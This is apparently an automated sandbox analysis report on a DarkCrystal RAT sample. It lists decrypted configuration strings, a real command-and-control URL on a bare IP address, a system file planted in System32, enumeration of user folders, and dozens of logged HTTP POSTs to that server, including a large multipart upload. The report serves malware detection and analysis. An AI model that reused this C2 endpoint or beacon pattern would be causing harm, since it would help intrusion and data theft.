                                    Source: kJrNOFEGbQ.exeJoe Sandbox ML: detected
                                    Source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["MMz00KmHKoJuKyp3EeVj8SRYjYE02IUoOfGVR3KK3FCkp0TVx587gtj34aRcGwOCUegorTmLULp2PqtsEtC7KWIe5Na0mrEH1AQLUoodTwnUDrnNriXXuQ27VBte3vjn","601e15a90bb00257f7c6912c3a0b56596eff0ce41f53b8f0d11a89075dccd10c","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxrU0VveFdsTkpjMGxxU1dsUGFVb3dZMjVXYkVscGQybE5lVWsyU1c1U2VXUlhWV2xNUTBrd1NXcHZhV1JJU2pGYVUwbHpTV3BWYVU5cFNqQmpibFpzU1dsM2FVNXBTVFpKYmxKNVpGZFZhVXhEU1ROSmFtOXBaRWhLTVZwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
                                    Source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/","imageVideorequestSecureProcesstrackwpcentral"]]
                                    Source: kJrNOFEGbQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: kJrNOFEGbQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kJrNOFEGbQ.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.pdb source: Mscommon.exe, 00000008.00000002.2004012692.00000000036BA000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0036A69B
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0037C220
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh8_2_00007FFD9BC8BA5D

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 193.58.121.137:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewASN Name: DCHASSELTBE DCHASSELTBE
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 380Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1440Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: multipart/form-data; boundary=----6V07bb5SvJtEV85TMFuIzJ8rpxR8Ce0HWmUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 127510Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1848Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1848Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1868Expect: 100-continueConnection: Keep-Alive
